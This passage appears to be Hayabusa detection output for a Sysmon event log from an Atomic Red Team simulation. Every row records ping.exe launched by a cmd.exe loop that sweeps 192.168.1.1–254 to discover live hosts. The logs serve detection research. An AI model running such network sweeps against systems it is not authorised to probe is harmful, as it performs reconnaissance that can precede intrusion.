747F3D96-D902-5D31-0000-0010B2393400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.25 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6104 | PGUID: 747F3D96-D903-5D31-0000-00109D3C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.26 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D903-5D31-0000-0010873F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.27 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1492 | PGUID: 747F3D96-D904-5D31-0000-001084423400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.28 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1316 | PGUID: 747F3D96-D904-5D31-0000-00106E453400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.29 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5640 | PGUID: 747F3D96-D905-5D31-0000-001058483400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.30 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2928 | PGUID: 747F3D96-D905-5D31-0000-0010554B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.31 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1952 | PGUID: 747F3D96-D906-5D31-0000-00103F4E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.32 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3760 | PGUID: 
747F3D96-D906-5D31-0000-001029513400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.33 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1992 | PGUID: 747F3D96-D907-5D31-0000-001013543400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.34 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4788 | PGUID: 747F3D96-D907-5D31-0000-0010DA5C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.35 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3212 | PGUID: 747F3D96-D908-5D31-0000-0010C45F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.36 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2552 | PGUID: 747F3D96-D908-5D31-0000-0010B2623400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.37 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2932 | PGUID: 747F3D96-D909-5D31-0000-00109E653400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.38 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6616 | PGUID: 747F3D96-D909-5D31-0000-001088683400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.39 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4312 | PGUID: 747F3D96-D90A-5D31-0000-0010726B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.40 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D90A-5D31-0000-00105C6E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.41 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 796 | PGUID: 747F3D96-D90B-5D31-0000-001046713400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.42 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D90B-5D31-0000-001031743400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.43 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D90C-5D31-0000-00102E773400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.44 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1360 | PGUID: 747F3D96-D90C-5D31-0000-0010F37F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.45 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5060 | PGUID: 747F3D96-D90D-5D31-0000-0010DD823400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.46 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4708 | PGUID: 747F3D96-D90D-5D31-0000-0010D6853400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.47 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4624 | PGUID: 
747F3D96-D90E-5D31-0000-0010D4883400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.48 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7032 | PGUID: 747F3D96-D90E-5D31-0000-0010C18B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.49 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D90E-5D31-0000-0010B58E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.50 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D90F-5D31-0000-00109F913400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.51 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D910-5D31-0000-001050953400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.52 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4544 | PGUID: 747F3D96-D910-5D31-0000-00108F983400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.53 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D910-5D31-0000-0010BFA43400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.54 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-D911-5D31-0000-001087AD3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.55 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1256 | PGUID: 747F3D96-D912-5D31-0000-001072B03400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.56 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D912-5D31-0000-00105CB33400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.57 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D913-5D31-0000-00105AB63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.58 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D913-5D31-0000-001044B93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.59 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5968 | PGUID: 747F3D96-D914-5D31-0000-001030BC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.60 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D914-5D31-0000-00102DBF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.61 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D915-5D31-0000-001017C23400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.62 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 
747F3D96-D915-5D31-0000-001002C53400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.63 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D916-5D31-0000-0010ECC73400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.64 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D916-5D31-0000-0010B1D03400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.65 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D917-5D31-0000-00109BD33400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.66 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4052 | PGUID: 747F3D96-D917-5D31-0000-001085D63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.67 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D918-5D31-0000-00106FD93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.68 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D918-5D31-0000-001059DC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.69 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D919-5D31-0000-00109EDF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.70 | Process: C:\Windows\System32\PING.EXE | User: 
